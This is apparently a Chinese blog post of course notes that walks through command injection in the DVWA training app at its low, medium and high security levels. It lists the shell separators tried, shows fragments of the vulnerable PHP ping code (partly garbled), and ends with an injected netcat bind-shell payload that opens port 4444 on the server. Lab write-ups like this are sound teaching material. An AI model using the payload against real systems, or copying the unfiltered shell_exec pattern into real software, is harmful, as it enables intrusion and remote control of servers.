Kali Linux渗透测试 086 手动漏洞挖掘-命令执行漏洞

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 命令执行漏洞
2. 测试 Low 安全模式
    2-1. 测试手段
    2-2. 服务器源码
3. 测试 Medium 安全模式
    3-1. 测试手段
    3-2. 服务器源码
4. 测试 high 安全模式
    4-1. 测试手段
    4-2. 服务器源码
5. 使服务器打开端口
    5-1. Low 安全模式

1. 命令执行漏洞


  1. 采用 DVWA 系统,IP地址:10.10.10.132
  2. Kali Linux 2018.1,IP地址:10.10.10.131
  3. 简介

    应用程序直接调用操作系统命令的功能

2. 测试 Low 安全模式


1. 测试手段

  1. 输入IP地址发现,是执行 ping 测试,发现和 ping 3 次结果一样

  2. 使用符号 “;”、“&”、“&&”、“|”、“||”

    • 使用“;”

    • 使用“&”

    • 使用“&&”

    • 使用“|”

    • 使用“||”

2. 服务器源码

# 低安全级别的情况下,服务器未进行任何过滤
 '.$cmd.'
'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target ); echo '
'.$cmd.'
'; } } ?>

3. 测试 Medium 安全模式


1. 测试手段

  1. 输入IP地址发现,是执行 ping 测试,发现和 ping 3 次结果一样

  2. 使用符号 “;”、“&”、“&&”、“|”、“||”

    • 使用“;”

      无结果

    • 使用“&”

    • 使用“&&”

      无结果

    • 使用“|”

    • 使用“||”

2. 服务器源码

# 进行了简单的过滤,替换:'&&' => '',';' => '',使其无效。
  '',
        ';' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
        $cmd = shell_exec( 'ping  ' . $target );
        echo '
'.$cmd.'
'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target ); echo '
'.$cmd.'
'; } } ?>

4. 测试 high 安全模式


1. 测试手段

  1. 输入IP地址发现,是执行 ping 测试,发现和 ping 3 次结果一样

  2. 使用符号 “;”、“&”、“&&”、“|”、“||”.

    • 使用“;”

    • 使用“&”

      同上

    • 使用“&&”

      同上

    • 使用“|”

      同上

    • 使用“||”

      同上

2. 服务器源码

#进行严格的过滤,不再存在命令执行漏洞
Command Execution Source
'.$cmd.'
'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target ); echo '
'.$cmd.'
'; } } else { echo '
ERROR: You have entered an invalid IP
'; } } ?>

5. 使服务器打开端口


1. Low 安全模式

  1. 打开监听端口

    ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
    

  2. 使用 kali 连接

  3. 弊端

    使用 nc 会被管理员发现打开了额外的端口

你可能感兴趣的:(kali-linux)